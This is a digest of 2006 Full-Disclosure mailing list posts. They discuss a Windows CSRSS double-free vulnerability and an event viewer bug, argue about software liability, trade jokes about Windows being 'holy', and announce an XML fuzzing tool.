Yes, probably this bug only affects event viewer itself. I don't understand how and why Microsoft achieved this effect in event viewer, which is, by the way, security tool, and if it's hard for different vendor to make same mistake. For what it's worth, the updated viewer in Windows Vista can show string inserts separately, in a list. IIRC its XML export function exports them separately, too ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption 0day
3APA3A wrote:
Killer{R} assumes the problem is in strcpy(), because it should not be
used for overlapping buffers, but at least ANSI implementation of strcpy
from Visual C should be safe in this very situation (copying to lower
addresses). May be code is different for Windows XP or vulnerability is
later in code.
We discovered this bug some time ago and were preparing an advisory when it was
publicly disclosed. Since the exploit is already public, here's my analysis of
the vulnerability:
http://www.determina.com/security.research/vulnerabilities/csrss-harderror.html
It's a double free bug that leads to arbitrary code execution in the CSRSS
process.
Alex
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [WEB SECURITY] comparing information security to other industries
Jason Muskat, GCFA, GCUX, de VE3TSJ wrote: People, programmers, computers, software, design patterns, systems, and infrastructure are constantly changing, often being reinvented. As such, will never be stable. Concrete of a type is always the same and therefore predictable. One can state with certainly that a concrete slab will perform to design. This will ever be possible in IT. Many commercially produced software products don¹t have any warranty. Many even state that the software is not warranted for any function or purpose. That's _because_ software makers argued long and hard for a special exemption from most standard producer liability regulations and laws, and in many cases also for protection from consumer protection laws. They made this argument mainly along the lines you opened your comments with -- everything is so complex and forever changing that if we had to do proper design, specification and testing we'd never produce anything and meeting those normal legal requirements would make everything ever so much less innovative and slower and only the very largest companies could ever afford to even think about writing software. This -- particularly the cost will bury us part -- is _still_ the main argument the OSS folk make against any and all suggestions that software liability rules should be tightened up. Thus, as NOT providing such guarantees is legally sanctioned, you cannot really use it as an argument supporting the any old slop we put on the disk will do approach we have sufferred from for far too long. ... The fact that the software does something that one thinks it should do is incidental. Yep. Given you seem so strongly in favour of the current couldn't really give a shit view of software quality, you'll be rushing to sign my petition requiriung all university and other educational courses in computer science to change their names to computer art craft or computer guesswork or something similarly accurately describing their professional endorsement of hit-and-miss, slop it all in a bucket then pour it through a compiler we especially dumbed down to not give a rats arse about quality approach, and for software engineering courses to similarly remove their abuse use of the term engineering... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption 0day
Holy mackerel! Instances of this bug date back to 1999!
http://groups.google.ca/group/microsoft.public.win32.programmer.kernel/browse_thread/thread/c5946bf40f227058/7bd7b5d66a4e5aff
--Pukhraj
On 12/21/06, Alexander Sotirov [EMAIL PROTECTED] wrote:
3APA3A wrote:
Killer{R} assumes the problem is in strcpy(), because it should not be
used for overlapping buffers, but at least ANSI implementation of strcpy
from Visual C should be safe in this very situation (copying to lower
addresses). May be code is different for Windows XP or vulnerability is
later in code.
We discovered this bug some time ago and were preparing an advisory when it
was
publicly disclosed. Since the exploit is already public, here's my analysis of
the vulnerability:
http://www.determina.com/security.research/vulnerabilities/csrss-harderror.html
It's a double free bug that leads to arbitrary code execution in the CSRSS
process.
Alex
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Windows is very holy
On Thu, 21 Dec 2006 23:15:41 GMT, Aaron Gray said: Sorry a dog not lions ! Of course, even the most bad-ass canine can be taken down by sufficient strength: Herakles asked Pouton [Haides] for Kerberos, and was told to take the hound if he could overpower it without using any of the weapons he had brought with him. He found Kerberos at the gates of Akheron, and there, pressed inside his armour and totally covered by the lion's skin, he threw his arms round its head and hung on, despite bites from the serpent-tail, until he convinced the beast with his choke-hold. Then, with it in tow, he made his ascent through Troizen. After showing Kerberos to Eurystheus, he took it back to Haides' realm. - Apollodorus, The Library 2.125 or cleverness: Huge Cerberus, monstrously couched in a cave confronting them, made the whole region echo with this three-throated barking. The Sibyl, seeing the snakes bristling upon his neck now, threw him for bait a cake for honey and wheat infused with sedative drugs. The creature, crazy with hunger, opened its three mouths, gobbled the bait; then its huge body relaxed and lay, sprawled out on the ground, the whole length of its cave kennel. Aeneas, passing its entrance, the watch-dog neutralize, strode rapidly from the bank of that river [Styx] of no return. - Virgil, Aeneid 6.417 http://www.theoi.com/Ther/KuonKerberos.html There's a security-related moral somewhere in there. :) pgpjKpSSTdvW2.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption 0day
Holy mackerel! Instances of this bug date back to 1999! Different bug. That appears to be a trivial exhaustion of CSRSS worker threads through indiscriminate calls to MessageBox+MB_SERVICE_NOTIFICATION, which causes a DoS as no threads are available to serve kernel-mode requests from win32k, stalling GUI processes. I have done my fair share of CSRSS reversing in my better days, and I'm pretty sure that in Windows 2000 and later, a dedicated thread is used for such notifications, not just any thread, any time. Easily verifiable with local net sends and Spy++. It wasn't a bug either, more like a serious design flaw that ignored a very basic Win32 mantra (don't do GUI in a worker thread) - not at all like this double-free ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Windows is very holy
On Thu, 2006-12-21 at 02:28 +, Aaron Gray wrote: Windows is very very holy. Don't you mean hole'y? ;-) -Jim P. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Windows is very holy
On Thu, 2006-12-21 at 20:37 -0500, Jim Popovitch wrote: On Thu, 2006-12-21 at 02:28 +, Aaron Gray wrote: Windows is very very holy. Don't you mean hole'y? ;-) OK, why do I get bounce messages from [EMAIL PROTECTED] (sub: Posting error: Secure Computing) [EMAIL PROTECTED] (sub: Blogger post failed) Seems to me that if you are smart enough to fwd email to a third place, you would be smart enough to have it accept from everyone (not just yourself). -Jim P. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [TOOL] untidy - XML Fuzzer
List, I'm glad to release a beta version of untidy; untidy is general purpose XML Fuzzer. It takes a string representation of a XML as input and generates a set of modified, potentially invalid, XMLs based on the input. It's released under GPL v2 and written in python. http://untidy.sourceforge.net/ Cheers, -- Andres Riancho ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Windows is very holy
Windows is very very holy. Don't you mean hole'y? ;-) Time for a gratuitous Sluggy Freelance reference! http://sluggy.com/daily.php?date=040208 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
